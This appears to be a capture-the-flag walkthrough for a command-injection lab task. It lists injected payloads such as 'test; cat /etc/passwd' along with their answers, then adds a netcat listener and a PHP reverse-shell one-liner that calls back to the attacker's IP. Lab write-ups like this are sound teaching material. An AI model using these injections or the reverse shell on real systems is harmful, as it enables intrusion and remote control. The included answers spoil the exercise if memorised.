Task 5

What strange text file is in the website root directory?

test; ls

Answer

drpepper.txt

How many non-root/non-service/non-daemon users are there?

test; cat /etc/passwd

Answer

What user is this app running as?

test; whoami

Answer

www-data

What is the user's shell set as?

test; cat /etc/passwd |grep www-data

Answer

/usr/sbin/nologin

What version of Ubuntu is running?

test ; cat /etc/os-release

or 

test ; lsb_release -a

Answer

18.04.4

Print out the MOTD. What favorite beverage is shown?

test ; locate 00-header
test ; cat /etc/update-motd.d/00-header

Answer

Dr Pepper

EXTRA

Spawn remote shell in that machine

Reverse Shell Cheat Sheet

On your machine

Open a localport on your machine

nc -lvnp 9001

On vulnerable webpage

Spawn this remote shell in the search input.

Replace 10.18.1.159 with your own VPN IP

test; php -r '$sock=fsockopen("10.18.1.159",9001);`sh <&3 >&3 2>&3`;'

PreviousOWASP Top10 NextTask 7

Last updated 3 years ago

hashtagWhat strange text file is in the website root directory?

hashtagAnswer

hashtagHow many non-root/non-service/non-daemon users are there?

hashtagAnswer

hashtagWhat user is this app running as?

hashtagAnswer

hashtagWhat is the user's shell set as?

hashtagAnswer

hashtagWhat version of Ubuntu is running?

hashtagAnswer

hashtagPrint out the MOTD. What favorite beverage is shown?

hashtagAnswer

hashtagEXTRA

hashtagSpawn remote shell in that machine

What strange text file is in the website root directory?

Answer

How many non-root/non-service/non-daemon users are there?

Answer

What user is this app running as?

Answer

What is the user's shell set as?

Answer

What version of Ubuntu is running?

Answer

Print out the MOTD. What favorite beverage is shown?

Answer

EXTRA

Spawn remote shell in that machine